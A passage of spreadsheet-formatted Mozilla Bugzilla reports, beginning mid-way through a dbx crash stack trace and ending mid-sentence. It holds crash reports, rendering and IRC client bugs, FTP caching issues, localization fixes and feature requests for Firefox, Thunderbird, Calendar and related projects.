/export/admin/build/mozilla1.0-CC/mozilla/xpcom/build/nsComponentManagerUtils.o
  [8] nsGetServiceByCID::operator()(0xffbfe87c 0xfc5bf228 0xffbfe7b4
0xff155184 0x0 0x0) at 0xff155228
dbx: warning: can't find file
/export/admin/build/mozilla1.0-CC/mozilla/xpcom/build/nsCOMPtr.o
  [9] nsCOMPtr_base::assign_from_helper(0x1f8f38 0xffbfe87c 0xfc5bf228
0xffbfe88c 0x0 0x0) at 0xff151c7c
dbx: warning: can't find file
/export/admin/build/mozilla1.0-CC/mozilla/layout/build/nsPresContext.o
  [10] nsCOMPtr::operator=(0x1f8f38 0xffbfe87c 0xffbfe88c
0x207bb8 0x0 0x0) at 0xfc39f6e4
  [11] nsPresContext::GetLookAndFeel(0x1f8ef8 0xffbfe91c 0x0 0xfc5d49f0
0xfc3a2d44 0x0) at 0xfc39c840
  [12] nsPresContext::nsPresContext(0x1f8ef8 0xffffffff 0x1 0x1f914c
0x1f90b4 0x1f9090) at 0xfc399a84
dbx: warning: can't find file
/export/admin/build/mozilla1.0-CC/mozilla/layout/build/nsGalleyContext.o
  [13] GalleyContext::GalleyContext(0x1f8ef8 0x0 0x0 0x0 0x0 0x0) at
0xfc395108
  [14] NS_NewGalleyContext(0xffbfea44 0xffbfea34 0x0 0x39670 0xffbfeb0c
0xff0e3f0c) at 0xfc395414
  [15] CreateNewGalleyContext(aOuter = ??? aIID = STRUCT aResult = ???)
(optimized) at 0xfc13f730 (line ~218) in nsLayoutModule.cpp
  [16] nsGenericFactory::CreateInstance(0x1f7fb8 0x0 0xfd445f0c 0xffbfebec
0xff1c076c 0xff1d1078) at 0xff152920
  [17] nsComponentManagerImpl::CreateInstance(0x400c8 0xfd46d8b4 0x0
0xfd445f0c 0xffbfebec 0x10a4) at 0xff0db064
  [18] nsCreateInstanceByCID::operator()(0xffbfed54 0xfd445f0c 0xffbfebec
0xff154f7c 0xfebc087c 0xffbfecd4) at 0xff154fe8
  [19] nsCOMPtr_base::assign_from_helper(0x1a30a0 0xffbfed54 0xfd445f0c
0xffbfed64 0xfcc2e300 0x2) at 0xff151c7c
dbx: warning: can't find file
/export/admin/build/mozilla1.0-CC/mozilla/content/build/nsDocumentViewer.o
  [20] nsCOMPtr::operator=(0x1a30a0 0xffbfed54 0xffbfed64
0xfd7f7e3c 0xff358e04 0xa000) at 0xfd12ebd4
  [21] DocumentViewerImpl::InitInternal(0x1a3068 0xfd7f7e3c 0x1d77f8
0xff357d90 0x1a30a0 0xfd42a3e8) at 0xfd11417c
  [22] DocumentViewerImpl::Init(0x1a3068 0x10c548 0x1d77f8 0xffbfee64
0xfd46db98 0xfd617898) at 0xfd114004
dbx: warning: can't find file
/export/admin/build/mozilla1.0-CC/mozilla/docshell/build/nsDocShell.o
  [23] nsDocShell::SetupNewViewer(0x11fa30 0x0 0xffbfeeac 0xfd70b804
0x11fac0 0x0) at 0xfd6a45cc
  [24] nsDocShell::Embed(0x11fa30 0x1a3068 0x11fb34 0x0 0x0 0x0) at
0xfd6a2164
  [25] nsDocShell::CreateContentViewer(0x11fa30 0xffbff048 0x120158
0xffbff04c 0xffbff05c 0xffbff060) at 0xfd6a34ac
dbx: warning: can't find file
/export/admin/build/mozilla1.0-CC/mozilla/docshell/build/nsDSURIContentListener.o
  [26] nsDSURIContentListener::DoContent(0x7ed60 0xffbff1d4 0x0 0x120158
0xffbff258 0xffbff214) at 0xfd6cd958
dbx: warning: can't find file
/export/admin/build/mozilla1.0-CC/mozilla/uriloader/build/nsURILoader.o
  [27] nsDocumentOpenInfo::DispatchContent(0xbfee8 0x120158 0x7ed60 0x11c1c0
0x11fa30 0x14) at 0xfd81f028
  [28] nsDocumentOpenInfo::OnStartRequest(0xbfee8 0x120158 0x0 0x0 0x4e420
0x0) at 0xfd81eaa8
dbx: warning: can't find file
/export/admin/build/mozilla1.0-CC/mozilla/netwerk/build/nsInputStreamChannel.o
  [29] nsStreamIOChannel::OnStartRequest(0x120158 0x1201dc 0x0 0xfe6f01d8
0x11c460 0x0) at 0xfe6edddc
dbx: warning: can't find file
/export/admin/build/mozilla1.0-CC/mozilla/netwerk/build/nsRequestObserverProxy.o
  [30] nsOnStartRequestEvent::HandleEvent(0x120018 0x15ceec 0x434 0x2800
0xfe865228 0x29fc) at 0xfe708418
  [31] nsARequestObserverEvent::HandlePLEvent(0x12001c 0x1 0x1 0x12001c
0xd0a5c 0xff1c34e4) at 0xfe70698c
dbx: warning: can't find file
/export/admin/build/mozilla1.0-CC/mozilla/xpcom/build/plevent.o
  [32] PL_HandleEvent(0x12001c 0x0 0x1000 0x137c 0x1000 0x1380) at
0xff0efd5c
  [33] PL_ProcessPendingEvents(0x688c0 0x1 0xd0c94 0x0 0xff1c076c
0x63680024) at 0xff0efb9c
dbx: warning: can't find file
/export/admin/build/mozilla1.0-CC/mozilla/xpcom/build/nsEventQueue.o
  [34] nsEventQueueImpl::ProcessPendingEvents(0x68890 0x0 0x2cec0 0x0
0xfff71470 0x0) at 0xff0f1e98
  [35] event_processor_callback(source = ??? condition = ??? data = ???)
(optimized) at 0xfe63bf14 (line ~57) in nsAppShell.cpp
dbx: warning: can't find file
/gnome/2.0/community/src-2.0_06/glib/glib/giounix.lo
  [36] g_io_unix_dispatch(0x1a28e8 0xfe63befc 0x68890 0xffbff6e0 0xfdc893c4
0x1) at 0xfdd2a184
dbx: warning: can't find file
/gnome/2.0/community/src-2.0_06/glib/glib/gmain.lo
  [37] g_main_dispatch(0xb9120 0x1a28e8 0xffffffff 0xfdcad72c 0xfdc8c314
0x1) at 0xfdce0370
  [38] g_main_context_dispatch(0xb9120 0x7fffffff 0x1a57c0 0x2 0x2 0x2) at
0xfdce2328
  [39] g_main_context_iterate(0xb9120 0x1 0x1 0x1a44e0 0xfe00ef98 0x2) at
0xfdce2a88
  [40] g_main_loop_run(0x1a57a8 0x1a57a8 0x0 0xfe6710f0 0x230 0x1a28a0) at
0xfdce3ab0
dbx: warning: can't find file
/gnome/2.0/community/src-2.0_06/gtk-multihead/gtk/gtkmain.lo
  [41] gtk_main(0x68890 0xfe600594 0xfe6586b9 0xffbff9a4 0x31b34
0xfe66de68) at 0xfe18eaf0
  [42] nsAppShell::Run(this = ???) (optimized) at 0xfe63c300 (line ~111) in
nsAppShell.cpp
  [43] nsAppShellService::Run(this = ???) (optimized) at 0xfe5af6a8 (line ~308)
in nsAppShellService.cpp
  [44] main1(argc = ??? argv = ??? nativeApp = ???) (optimized) at 0x17c0c
(line ~1432) in nsAppRunner.cpp
  [45] main(argc = ??? argv = ???) (optimized) at 0x18314 (line ~1775) in
nsAppRunner.cpp
(/opt/SUNWspro/bin/../WS6U2/bin/sparcv9/dbx) 
***************above is function stack when segment fault happens*************</t>
  </si>
  <si>
    <t>jay.yan</t>
  </si>
  <si>
    <t>CORE-386253</t>
  </si>
  <si>
    <t>Crash [@ nsRefPtr::assign_assuming_AddRef] with flash testcase toggling display and reloading</t>
  </si>
  <si>
    <t>Created attachment 270228
flash file needed for testcase
See upcoming testcase which crashes current trunk builds after a few reloads (reloads automatically).
The contenteditable attributes are necessary for the crash to happen so I guess this is a regression from bug 237964 somehow.
https://crash-reports.mozilla.com/reports/report/index/54bbdb91-25bf-11dc-8c21-001a4bd43ed6
0  	nsRefPtr::assign_assuming_AddRef(nsPACManCallback *)
1 	nsCOMPtr_base::assign_with_AddRef(nsISupports *)
2 	nsBaseWidget::RemoveChild(nsIWidget *)
3 	nsBaseWidget::Destroy()
4 	nsWindow::Destroy()
5 	nsPluginInstanceOwner::Destroy()
6 	DoStopPlugin
7 	nsStopPluginRunnable::Run()
8 	nsThread::ProcessNextEvent(intint *)
9 	NS_ProcessNextEvent_P(nsIThread *int)
(PACManCallback what on earth is that?)</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-185272</t>
  </si>
  <si>
    <t>user left channel messages from quakenet sometimes appear in undefined tab</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.2.1) Gecko/20021130
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.2.1) Gecko/20021130
When connected to Quakenet (irc.eu.quakenet.org) and chatting in several
channels at once some (not all and not from any channel in particular)
[ct]SomeNick left undefined messages appear in a new tab called undefined.
The URL for this tab reads irc://quakenet/undefined. It does not happen on any
other network but always when connected to quakenet. 
Reproducible: Always
Steps to Reproduce:
1. Connect to the QuakeNet IRC Network and start chatting.
Actual Results:  
Notice how after some time a new tab called undefined will show up.
Observe how some user left channel messages where the channel name is always
undefined will mysteriously find their way to this tab.
Expected Results:  
The user left channel messages should quite obviously show up in the tabs
for the respective channels which the users mentioned in the messages left.</t>
  </si>
  <si>
    <t>hcymulng02</t>
  </si>
  <si>
    <t>CORE-142788</t>
  </si>
  <si>
    <t>Mozilla renders malformed comments incorrectly</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.0rc1) Gecko/20020417
BuildID:    2002041717
An HTML tag 
causes everything after the tag to be rendered as a comment
Reproducible: Always
Steps to Reproduce:
1.Look at a page with a 
2.
3.
Actual Results:  Everything after the comment does not appear
Expected Results:  Stop the comment tag at &gt;
&lt;IMG SRC=http://www.gnacademy.org/~gna-moo/rooms/reception.construction.jpg  
ALIGN=TOP&gt;
You are in the half finished reception area.  There a large amount of masonry
and sawdust in the air.  There is a table with plans and construction tools in
the corner.  The walls are made of unpainted plaster and there are wires
sticking out of them.
There is a passageway north to the GNA Cafe and a stairway up to the GNA
Adminstrative offices.</t>
  </si>
  <si>
    <t>BUGZILLA-215208</t>
  </si>
  <si>
    <t>Descriptions in view activity bug still in english</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 es-ES rv:1.4) Gecko/20030625
Build Identifier: Mozilla/5.0 (X11 U Linux i686 es-ES rv:1.4) Gecko/20030625
In 2.17.4 clicking to view the activity bug there isn't a map for activities
and related material for getting it translated.
I'm working on a way to fix it but I think it will take me some time unless
somebody wants to take it right away.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>FIREFOX-371826</t>
  </si>
  <si>
    <t>remove redundant bookmarks/annotation getters in the places controller</t>
  </si>
  <si>
    <t>Now that PlacesUtils is a property of the controller the bookmark and annotation getters can be removed in favor of the utils ones.</t>
  </si>
  <si>
    <t>TOOLKIT-381352</t>
  </si>
  <si>
    <t>remove CSS rules pointing to inexistent classicBindings.xml</t>
  </si>
  <si>
    <t>formatting.css on *stripe and Classic refers to classicBindings.xml but that file doesn't even exist. We seems to not use the double-box that appears to be defined using that file anyways so we just should remove those definitions.
See http://mxr.mozilla.org/mozilla/search?string=classicBindings.xml and http://mxr.mozilla.org/seamonkey/search?string=double-box</t>
  </si>
  <si>
    <t>CORE-335387</t>
  </si>
  <si>
    <t>remove remnants of content packs</t>
  </si>
  <si>
    <t>After content packs have been killed in toolkit a long time ago and bug 325473 also removed those separate packs from suite we should wipe the remnants of content pack handling from our code as well like contentlocale prefs etc.
Those lxr searches turn up places where we still refer to content packs:
http://lxr.mozilla.org/mozilla/search?string=contentlocale
http://lxr.mozilla.org/mozilla/search?string=content+pack
http://lxr.mozilla.org/mozilla/search?string=content-pack
http://lxr.mozilla.org/mozilla/search?string=localeType
http://lxr.mozilla.org/seamonkey/search?string=regus
Note that help knows the concept of help content packs which are something
different than what we are handling here but turn up in some searches.</t>
  </si>
  <si>
    <t>CORE-394550</t>
  </si>
  <si>
    <t>FTP dir listing uses data from cache</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a8pre) Gecko/2007083115 Minefield/3.0a8pre
Build Identifier: 
After the checkin for bug 294800 the dir listing uses data from cache. If I go for example to ftp://ftp.eu.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/ the Last modified time and date aren't updated. Only after a reload I receive the actual modify date.
It looks like all data comes from cache. I think FTP/File/Jar/Gopher dir listings shoulden't be cached.
Reproducible: Always
Steps to Reproduce:
1. Go to a ftp://ftp site witch uptates frequently
2. revisit this site after 1 hour
3. check the modify dates
4. press refresh
5. check the modify dates again
Actual Results:  
Only after step 4 the modify dates are the actuals
Expected Results:  
The modify dates are by every visit the actuals</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-174087</t>
  </si>
  <si>
    <t>[RFE] Support IRC over SSL/TLS</t>
  </si>
  <si>
    <t>Feature to communicate with IRC servers over SSL/TLS-encrypted connections.
On the server side use sslwrap or something similar to create an SSL-enabled
IRC server. On the client side (which this bug is about) we can probably use
Mozilla SSL functions very much like Mailnews does.</t>
  </si>
  <si>
    <t>FIREFOX-227761</t>
  </si>
  <si>
    <t>Hardcoded Firebird string in phrase: downloadsRemoveExit.label</t>
  </si>
  <si>
    <t xml:space="preserve">User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 de-DE rv:1.5) Gecko/20031007 Firebird/0.7
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 de-DE rv:1.5) Gecko/20031007 Firebird/0.7
The text says: When Firebird exits
The BrandName should never be hardcodet. It can always change (as we now ) )
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
Expected Results:  
The BrandName should be changed into something like </t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-512620</t>
  </si>
  <si>
    <t>Add site page</t>
  </si>
  <si>
    <t>THUNDERBIRD-327226</t>
  </si>
  <si>
    <t>www prefix can confuse the phishing detector</t>
  </si>
  <si>
    <t>Rafael had an e-mail sig that had a URL of:
actual anchor src: http://www.mozilla.org
user text: http://mozilla.org
This triggered the phishing detector because we detected that the url being shown to the user did not match the actual url you would get taken too.
I wonder if we should hack a check for www. and strip that off the front of the host name before doing the comparison.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-159800</t>
  </si>
  <si>
    <t>Smart Trust - Mozilla crashes on login due to secmod.db</t>
  </si>
  <si>
    <t>Windows 2000
5.00.2195
Service Pack 2
Mozilla Build ID: 2002053012
Every time when I go to
http://bugzilla.mozilla.org/query.cgi?GoAheadAndLogIn=1
and press the Login-button (after I have entered user id and password) Mozilla
immediatly crashes. I have also experienced identical behaviour with 1.1b but 
then I unsinstalled 1.1b and installed 1.0 instead. Thus I do not have a build 
id for 1.1b at this time.
I can log in to bugzilla without any problems using Netscape Communicator 
4.79[en]-20011017 which is installed on the above system. I can also log in to 
bugzilla using Mozilla 1.0 on Sun Sparc Solaris (Build ID: 2002061103). All 
mozilla installations where binary distributions downloaded from the Mozilla 
FTP server.
I will send in a TalkBack (Netscape Quality Feedback Agent - Gecko1.0) report 
with the ID for this bug in the description.</t>
  </si>
  <si>
    <t>johol</t>
  </si>
  <si>
    <t>FIREFOX-941109</t>
  </si>
  <si>
    <t>Australis: Overflow&amp;menu panels should respect closemenu xul attribute in children</t>
  </si>
  <si>
    <t>My Simple Locale Switcher extension has the following xul code for a toolbar button:
    ...
If this button is placed inside the new menu panel or the overflow panel toggling the checkbox keep the button's popup open *but* the parent panel is closed. See:
https://developer.mozilla.org/en-US/docs/XUL/Attribute/closemenu</t>
  </si>
  <si>
    <t>nohamelin</t>
  </si>
  <si>
    <t>DOCUMENTATION_GRAVEYARD-263436</t>
  </si>
  <si>
    <t>DOM Ref: Event Handler Properties documentation flawed</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040113
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040113
In the Gecko DOM Reference check the DOM _Element_ Reference:
http://www.mozilla.org/docs/dom/domref/dom_el_ref.html#1022767
If you scroll down you'll find the description of possible Event Handlers for an
HTML element e.g. onclick. There's also a link to an example:
http://www.mozilla.org/docs/dom/domref/dom_el_ref63.html
It states:
  p.onclick = alert('moot!')
I think that's plain wrong. You can not assign a string to an event handler but
only a function reference. Thus it should rather read 
 p.onclick=function() {
        alert('moot!')
}
Additionally on the DOM _Element_ Reference page the event handler property is
said to be read only. Thats also wrong. And the example - albeit it does not
work - contradicts this.
Reproducible: Always
Steps to Reproduce:
1. Open the DOM Ref documentation page.
2. Read about Event Handler properties.
3. Try the example.
4. Wonder why the code does not work on any browser.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-334479</t>
  </si>
  <si>
    <t>RSS feeds cannot be updated individually</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
RSS feeds should have the ability to be updated seperatley not all the feeds at once. This could be hidden in the Manage Subscriptions dialog in the context menu but it should be there.
Reproducible: Always</t>
  </si>
  <si>
    <t>jonathanr.pritchard+bugzilla</t>
  </si>
  <si>
    <t>CORE-173601</t>
  </si>
  <si>
    <t>nsIStringEnumerator</t>
  </si>
  <si>
    <t>it would be really great if we had specialized interfaces for arrays of AString
and ACString to avoid nsISupportsAString and nsISupportsACString.  something
like this:
interface nsIStringArray : nsISupports
{
  readonly attribute unsigned long length
  AString getElementAt(in unsigned long index) 
  unsigned long indexOf(in unsigned long startIndex in ACString element)
  nsIStringEnumerator enumerate()
}
interface nsIStringEnumerator : nsISupports
{
  boolean hasMore()
  AString getNext()
}
ditto for ACString.  i think it is worthwhile to special case strings since
string arrays are so common.  i'm not sure that nsIStringEnumerator is the
correct name... wouldn't want to confuse it with iterating over a string but
nsIStringArrayEnumerator seems wrong since the enumeration need not be of an array.</t>
  </si>
  <si>
    <t>CALENDAR-474275</t>
  </si>
  <si>
    <t>Alarms don't store on storage calendar</t>
  </si>
  <si>
    <t>STEPS TO REPRODUCE:
===================
- create an recurring event with alarm
- wait...
RESULT:
=======
- no alarm icon in calendar view
- no alarm comes up
EXPECTED RESULT:
================
- the user should get an alarm
REPRODUCIBLE:
=============
- always
Defect in  lightning build 20090118 works in build 20090116.</t>
  </si>
  <si>
    <t>andreas.treumann</t>
  </si>
  <si>
    <t>CORE-516323</t>
  </si>
  <si>
    <t>Ogg Theora video with two audio tracks fails to play</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.2a1pre) Gecko/20090728 Minefield/3.6a1pre
The above multitrack Ogg Theora/Vorbis file plays in VLC and other Ogg players but refuses to decode in Firefox 3.5.3 and Firefox 3.6a1.
Chris Double found: liboggplay is returning E_OGGPLAY_BAD_INPUT when firefox tries to decode it for some reason.
Reproducible: Always
Steps to Reproduce:
1. Load URL
2.
3.
Actual Results:  
grey video box with X in it
Expected Results:  
video loaded and ready to play</t>
  </si>
  <si>
    <t>silviapfeiffer1</t>
  </si>
  <si>
    <t>CORE-635442</t>
  </si>
  <si>
    <t>Crash [@ nsSVGComponentTransferFunctionElement::DidAnimateNumberList]</t>
  </si>
  <si>
    <t>Created attachment 513684
testcase (crashes Firefox when loaded)
Based on layout/reftests/svg/smil/anim-feFuncR-tableValues-01.svg</t>
  </si>
  <si>
    <t>NSS-129778</t>
  </si>
  <si>
    <t>Crash while running strsclnt in debugging mode while memory leak checking</t>
  </si>
  <si>
    <t>While running strsclnt in debugging mode on BoundsChecker to find memory leaks
in the client auth on second handshake scenario this crash is reported 
This is the call stack : (BoundsChecker has a max limit of 19 while reporting
call stack)
Invalid argument
free HANDLE: 0x02AE4590
Bad handle
Location of Error
PR_Free
prmem.c
82
PR_DestroyLock
prulock.c
215
nssListIterator_Destroy
list.c
381
cert_token_not_present
trustdomain.c
527
NSSTrustDomain_FindCertificateByEncodedCertificate
trustdomain.c
752
__CERT_NewTempCertificate
stanpcertdb.c
204
ssl3_HandleCertificate
ssl3con.c
6516
ssl3_HandleHandshakeMessage
ssl3con.c
7142
ssl3_HandleHandshake
ssl3con.c
7258
ssl3_HandleRecord
ssl3con.c
7523
ssl3_GatherCompleteHandshake
ssl3gthr.c
203
ssl_GatherRecord1stHandshake
sslcon.c
1256
ssl_Do1stHandshake
sslsecur.c
155
ssl_SecureSend
sslsecur.c
1036
ssl_SecureWrite
sslsecur.c
1070
ssl_Write
sslsock.c
1260
PR_Write
priometh.c
141
handle_connection
strsclnt.c
641
do_connects
strsclnt.c
768</t>
  </si>
  <si>
    <t>BUGZILLA-275637</t>
  </si>
  <si>
    <t>Templatise 'voteremovedmail' email</t>
  </si>
  <si>
    <t>The 'voterremovedmail' param should instead be a template.
See bug 84876 for hints and possible code for this.</t>
  </si>
  <si>
    <t>CORE-107578</t>
  </si>
  <si>
    <t>M097 Trunk crash [@ PresShell::HandleEventInternal]</t>
  </si>
  <si>
    <t>This one is a topcrasher on M095. On the basis of the user comments users may
be crashing because the browser is not properly handling popups.
     (37377408) URL: http://nexus.etracks.com/cgi-bin?9XoXXXyTEsPnWCYwhDIXzXP
     (37377408) Comments: visiting the above URL from an e-mail link
     (37322206) Comments: opening a link in a new tab
     (37311334) URL: http://www.cat.nyu.edu/~perlin/facedemo/
     (37311334) Comments: Surfing page 5 of the Techhard article on the MSI
nForce motherboard. It has some nasty pop-up.
     (37311290) URL: http://www.cat.nyu.edu/~perlin/facedemo/
     (37311290) Comments: surfing techhard (a site with lots of pop-up ads).
     (37303716) URL: http://sl.sports..com
     (37260325) URL: http://www.snapserver..com
     (37162457) URL: http://sl.sports..com
     (37161749) URL: http://sl.sports..com
     (37161689) URL: http://sl.sports..com
     (37115249) URL: http://www.w3.org/P3P/
     (37115249) Comments: Probably something to do with browser tabs
     (37039560) URL: www.killfrog.com
     (37039560) Comments: Seems to be repeatable  whenever I try to go to
www.killfrog.com  by typing the url (I don't have it bookmarked or anything) it
crashes.
     (37039493) URL: www.killfrog.com
     (37039493) Comments: Just loading the page. New browser window was opened 
typed in the url and it crashed before displaying anything.
     (37029965) URL: http://www.overclockmania.net
     (37029965) Comments: This error occurs every time I try to visit that url.
     (36987993) URL: www.freeroms.com
     (36987993) Comments: Downloading romz
Here is the stack:
         PresShell::HandleEventInternal
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsPresShell.cpp  line 5707]
         PresShell::HandleEvent
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsPresShell.cpp
line 5547]
         nsView::HandleEvent    [d:\builds\seamonkey\mozilla\view\src\nsView.cpp
 line 331]
         nsViewManager::DispatchEvent  
[d:\builds\seamonkey\mozilla\view\src\nsViewManager.cpp
line 2094]
         HandleEvent    [d:\builds\seamonkey\mozilla\view\src\nsView.cpp  line 83]
         nsWindow::DispatchEvent
[d:\builds\seamonkey\mozilla\widget\src\windows\nsWindow.cpp  line 749]
         nsWindow::DispatchWindowEvent
[d:\builds\seamonkey\mozilla\widget\src\windows\nsWindow.cpp  line 766]
         nsWindow::DispatchAccessibleEvent
[d:\builds\seamonkey\mozilla\widget\src\windows\nsWindow.cpp  line 4456]
         nsWindow::CreateRootAccessible
[d:\builds\seamonkey\mozilla\widget\src\windows\nsWindow.cpp  line 5896]
         nsWindow::ProcessMessage
[d:\builds\seamonkey\mozilla\widget\src\windows\nsWindow.cpp  line 3394]
         nsWindow::WindowProc  
[d:\builds\seamonkey\mozilla\widget\src\windows\nsWindow.cpp  line
1014]
         KERNEL32.DLL + 0x3613 (0xbff63613)
         KERNEL32.DLL + 0x248f7 (0xbff848f7)
        Source File : 
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/layout/html/base/src/nsPresShell.cpp
line :
5707</t>
  </si>
  <si>
    <t>greer</t>
  </si>
  <si>
    <t>CORE-265860</t>
  </si>
  <si>
    <t>Links jump out from under mouse onclick</t>
  </si>
  <si>
    <t>There are some pages where links jump out from under the mouse on the first
click. No JS and no CSS is set on these links.
One example:
http://www.xs4all.nl/~eijsel/inhoud.html
Click on any link *in the first paragraph* (e.g. Birdphotography tips
Hotspots Photo Database.</t>
  </si>
  <si>
    <t>CORE-526017</t>
  </si>
  <si>
    <t>[webgl] Collapse state query calls</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-194162</t>
  </si>
  <si>
    <t>Provide ability to delete all completed downloads in Download Manager</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.0.1) Gecko/20030219 Chimera/0.6+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.0.1) Gecko/20030219 Chimera/0.6+
Provide the ability to rapidly clear the entire status list of completed
downloads in Download Manager (e.g. Select All...Delete or a Delete All button).
Resubmitted from bug 187472 by QA request.
Reproducible: Always
Steps to Reproduce:
1. Save As... multiple files.
2.  Delete all records of downloads from the Download Manager.
Actual Results:  
Remove each record individually by repeatedly clicking their x widgets.
Expected Results:  
Allow Select All...Delete or provide a widget to delete all completed line
items in Download Manager.</t>
  </si>
  <si>
    <t>sdagley</t>
  </si>
  <si>
    <t>tenbrook</t>
  </si>
  <si>
    <t>CORE-921456</t>
  </si>
  <si>
    <t>Remove unused nsSVGElement::GetPresentationAttribute prototype.</t>
  </si>
  <si>
    <t>getPresentationAttribute has been removed from SVG 2 anyway.</t>
  </si>
  <si>
    <t>SEAMONKEY-190884</t>
  </si>
  <si>
    <t>FreeBSD requires -Bsymbolic for compatibility with GTK 2 and Xft</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 Galeon/1.2.6 (X11 FreeBSD i386 U) Gecko/0
Build Identifier: Mozilla/5.0 Galeon/1.2.6 (X11 FreeBSD i386 U) Gecko/0
If Mozilla is linked without -Bsymbolic on FreeBSD most things work as
expected.  However if the browser is built with GTK2 and Xft support there are
symbol clashes (namely with Xft1 and Xft2 or with expat).  Both Linux and NetBSD
already use this option.
The one downside to enabling this is that a lot of unresolved symbol messages
are printed while building.  These appear to be harmless as the finished product
can resolve all the symbols.
This patch has been tested on FreeBSD 4.7-STABLE as well as 5.0-RELEASE and
-CURRENT.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>CALENDAR-290228</t>
  </si>
  <si>
    <t>Make new calendar wizard localizable</t>
  </si>
  <si>
    <t>Followup from bug 286959. The patch in that bug does include unlocalizable
strings. This bug aims to correct that.</t>
  </si>
  <si>
    <t>WEBSITES-411376</t>
  </si>
  <si>
    <t>Changing my feed on planet</t>
  </si>
  <si>
    <t>I'd like to have only the posts from my blog that are tagged Planet be posted on planet.mozilla.org.
The new feed for this will be:
http://blog.mozilla.com/seth/category/planet/feed</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-324507</t>
  </si>
  <si>
    <t>change guid for slashy &amp; linky &amp; launchy</t>
  </si>
  <si>
    <t>old guid: b4c73c9e-cfad-4d16-b7dd-60d8c549cb5b
new guid: slashy@gemal.dk
old guid: 24898804-7da3-4355-9e8d-065f3ee79ccc
new guid: linky@gemal.dk
and that's it! thanx!</t>
  </si>
  <si>
    <t>CORE-342146</t>
  </si>
  <si>
    <t>Implement basic support for windows/documents and hook up to widget/</t>
  </si>
  <si>
    <t>This bug is for the work to hook up window/document support for the mac a11y as well as the code that hooks up widget/src/cocoa up to the accessibility module.</t>
  </si>
  <si>
    <t>SEAMONKEY-305158</t>
  </si>
  <si>
    <t>Checkin for bug 304739 broke contentAreaClick()</t>
  </si>
  <si>
    <t>STEPS TO REPRODUCE:  Try to middle-mouse-paste a URL into the content area. 
Watch nothing happen other than an error that the empty string url was blocked
by security in the JS console.
The problem is that the patch for bug 304739 changed contentAreaClick() as follows:
-    var ceParams = {event: event href:  linkNode: null}
-    hrefAndLinkNodeForClickEvent(ceParams)
-    var href = ceParams.href
-    if (href) {
+    var ceParams = hrefAndLinkNodeForClickEvent(event)
+    if (ceParams) {
The problem is that |ceParams| is NEVER null here because the code at
http://lxr.mozilla.org/seamonkey/source/xpfe/communicator/resources/content/contentAreaClick.js#152
guarantees that linkNode is never null at the end of
hrefAndLinkNodeForClickEvent().  So we end up taking the link click path even
if no link was actually clicked instead of doing what we're supposed to be doing...</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-468155</t>
  </si>
  <si>
    <t>offline download button on imap folder props doesn't work</t>
  </si>
  <si>
    <t>Created attachment 351610
proposed fix
If I click the download button on the offline tab of the folder properties dialog it does nothing. Fix upcoming.
The fix is to restore some of the code that the auto sync landing removed. This code is only hit when nsImapMailFolder::DownloadAllForOffline is called which is from the folder properties dialog and the file | offline download and sync now.
I'd probably respin b1 for this except that the auto sync should take of most peoples needs and no one seems to have noticed this up til now...thoughts?</t>
  </si>
  <si>
    <t>CORE-395301</t>
  </si>
  <si>
    <t>Move offscreen surface creation from gfxOS2Platform to gfxOS2Surface</t>
  </si>
  <si>
    <t>Currently the offscreen surface is created in gfxOS2Platform and its presentation handle mPS is kept around until the gfxOS2Platform is destroyed i.e. until program shutdown. We should really do it like the other platforms and use new gfxOS2Surface with suitable arguments in gfxOS2Platform and then keep the handle around in the surface class instead.
I already have a patch to do that but I need to clean it up first...</t>
  </si>
  <si>
    <t>TOOLKIT-301875</t>
  </si>
  <si>
    <t>since 20050723: cannot install themes</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b4) Gecko/20050723 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b4) Gecko/20050723 Firefox/1.0+
With build 20050323 it is apparently impossible to install a theme.
* dropping a theme jar file in the extensions folder just does nothing. Firefox
